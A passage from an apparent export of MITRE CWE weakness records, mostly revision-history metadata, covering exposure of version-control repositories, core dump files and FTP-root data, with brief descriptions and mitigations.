"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Background_Details, Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2015-12-07",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-02-24",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Sensitive Data Under FTP Root",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "552",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null |
[
"Various Unix FTP servers require a password file that is under the FTP root, due to use of chroot."
] | 2
|
[
[
"664",
"668",
"552",
"220"
],
[
"284",
"285",
"552",
"220"
]
] |
[] |
527
|
Exposure of Version-Control Repository to an Unauthorized Control Sphere
|
Variant
|
Simple
|
Incomplete
|
The product stores a CVS, git, or other repository in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.
|
Version control repositories such as CVS or git store version-specific metadata and other details within subdirectories. If these subdirectories are stored on a web server or added to an archive, then these could be used by an attacker. This information may include usernames, filenames, path root, IP addresses, and detailed "diff" data about how files have been changed - which could reveal source code snippets that were never intended to be made public.
| null | null |
[
{
"Note": "OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.",
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Read Files or Directories"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "Recommendations include removing any CVS directories and repositories from the production server, disabling the use of remote CVS repositories, and ensuring that the latest CVS patches and version updates have been performed.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Operation",
"Distribution",
"System Configuration"
],
"Strategy": null
}
] | null | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, Relationships, Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-12-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Information Leak Through CVS Repository",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-02-24",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Exposure of CVS Repository to an Unauthorized Control Sphere",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "552",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 2
|
[
[
"664",
"668",
"552",
"527"
],
[
"284",
"285",
"552",
"527"
]
] |
[] |
528
|
Exposure of Core Dump File to an Unauthorized Control Sphere
|
Variant
|
Simple
|
Draft
|
The product generates a core dump file in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.
| null | null | null |
[
{
"Note": "OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.",
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Read Files or Directories"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "Protect the core dump files from unauthorized access.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"System Configuration"
],
"Strategy": null
}
] | null | null |
[
{
"EntryID": "MEM06-C",
"EntryName": "Ensure that sensitive data is not written out to disk",
"MappingFit": null,
"TaxonomyName": "CERT C Secure Coding"
}
] | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-11-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-09-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
